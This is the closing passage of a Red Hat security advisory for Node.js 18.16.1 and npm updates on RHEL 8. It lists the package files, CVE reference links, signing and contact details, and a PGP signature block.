nodejs-devel-18.16.1-1.module+el8.8.0+19438+94e84959.s390x.rpm  
nodejs-full-i18n-18.16.1-1.module+el8.8.0+19438+94e84959.s390x.rpm  
npm-9.5.1-1.18.16.1.1.module+el8.8.0+19438+94e84959.s390x.rpm

x86_64:  
nodejs-18.16.1-1.module+el8.8.0+19438+94e84959.x86_64.rpm  
nodejs-debuginfo-18.16.1-1.module+el8.8.0+19438+94e84959.x86_64.rpm  
nodejs-debugsource-18.16.1-1.module+el8.8.0+19438+94e84959.x86_64.rpm  
nodejs-devel-18.16.1-1.module+el8.8.0+19438+94e84959.x86_64.rpm  
nodejs-full-i18n-18.16.1-1.module+el8.8.0+19438+94e84959.x86_64.rpm  
npm-9.5.1-1.18.16.1.1.module+el8.8.0+19438+94e84959.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30581  
https://access.redhat.com/security/cve/CVE-2023-30588  
https://access.redhat.com/security/cve/CVE-2023-30589  
https://access.redhat.com/security/cve/CVE-2023-30590  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0lAnAAoJENzjgjWX9erE+YcP/A0F2EnhphBzods/CSKlKem6  
6bfnz24Oux9G40rK+jrU3CYljB6Qq+WwfkkQvONYrFtM8zR5Aszfna8prw3DGeAo  
F/Mgeu6lkLmvLLDIfQZ/5eHVai/xIwOTxQx9ptR61xMeRDv3gPx2QYA41hFIGEjI  
qiBEVvU+twFfGqtF9Nc8/VECEr6VvflZDb6JqcJLhRq1Z+XAjC8octbT7xZGedfu  
yLOohpbnx3/uioLeyKLg/BeUzxKYrjus9JU8tGHpw/tY9Sjk4IusUwOumkl0fzfK  
vyUmEkpIFhWF+fqzADU49ofEhLVMMwQ/hCym6h/FoZ1huURXZvPu8JU3YjVrgUB6  
5Qxv5befHzaxvbEeq2uhcb/mOz23br4Vnm1GLeI3IrXX9dEgNENmxv6pqmuoHQnW  
QB7pjcL0V0Agqv9o4xzG+RYQ74bCcK8HgAzzmKY6JQis0wglNrm20+zq/8qitdCW  
HTBXsROktQCEBpTYLiW65s49jWxmCKO2ddTbgX/xRDe96Uh7C68C308dZnMEhJLK  
iERTMpk16v213ALLHTxlc3dET2rDpZ1IW3JvWooAkdypfgnnScqZ/SCBBKTj13vf  
uOchGet065eJauwixjoqCoI0zYlMPe3qf6ljSURNLaW5x0WO6rYeBW888aUNPTJC  
lVNLPMoRzqNOFSQPS+Gg  
=pehV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm